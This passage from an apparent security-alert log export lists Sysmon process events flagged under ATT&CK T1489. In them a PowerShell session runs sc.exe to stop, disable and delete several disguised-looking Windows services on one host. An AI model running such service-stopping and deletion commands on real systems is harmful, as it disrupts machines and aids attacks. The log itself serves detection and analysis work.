12:50:56.088"",""processGuid"":""{df9fc3d3-b3b0-5ecf-0000-0010f51d2600}"",""processId"":""1412"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Sncryption Media Playeq\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:24.432",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:56.042 +ProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010da192600} +ProcessId: 7788 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""NetMsmqActiv Media NVIDIA"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""NetMsmqActiv Media NVIDIA\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:56.050403300Z"",""eventRecordID"":""2918"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:56.042\r\nProcessGuid: {df9fc3d3-b3b0-5ecf-0000-0010da192600}\r\nProcessId: 7788\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""NetMsmqActiv Media NVIDIA\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:56.042"",""processGuid"":""{df9fc3d3-b3b0-5ecf-0000-0010da192600}"",""processId"":""7788"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""NetMsmqActiv Media NVIDIA\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:24.369",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.977 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010da152600} +ProcessId: 8080 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop RpcEptManger +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop RpcEptManger",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.981538500Z"",""eventRecordID"":""2915"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.977\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010da152600}\r\nProcessId: 8080\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop RpcEptManger\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.977"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-0010da152600}"",""processId"":""8080"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop RpcEptManger"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:24.355",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.955 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-001003142600} +ProcessId: 5296 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config RpcEptManger Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config RpcEptManger Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.957550400Z"",""eventRecordID"":""2914"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.955\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-001003142600}\r\nProcessId: 5296\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config RpcEptManger Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.955"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-001003142600}"",""processId"":""5296"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config RpcEptManger Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:24.322",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.924 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010d2112600} +ProcessId: 7976 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Samserver +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Samserver",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.927955600Z"",""eventRecordID"":""2912"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.924\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010d2112600}\r\nProcessId: 7976\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Samserver\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.924"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-0010d2112600}"",""processId"":""7976"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Samserver"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:24.276",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.879 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010d00b2600} +ProcessId: 7592 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelp64 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp64",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.881601500Z"",""eventRecordID"":""2909"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.879\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010d00b2600}\r\nProcessId: 7592\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelp64\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.879"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-0010d00b2600}"",""processId"":""7592"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelp64"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:24.229",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:55.849 +ProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010d3072600} +ProcessId: 3648 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete WinHelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete WinHelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:55.853525200Z"",""eventRecordID"":""2907"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:55.849\r\nProcessGuid: {df9fc3d3-b3af-5ecf-0000-0010d3072600}\r\nProcessId: 3648\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete WinHelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:55.849"",""processGuid"":""{df9fc3d3-b3af-5ecf-0000-0010d3072600}"",""processId"":""3648"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete WinHelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 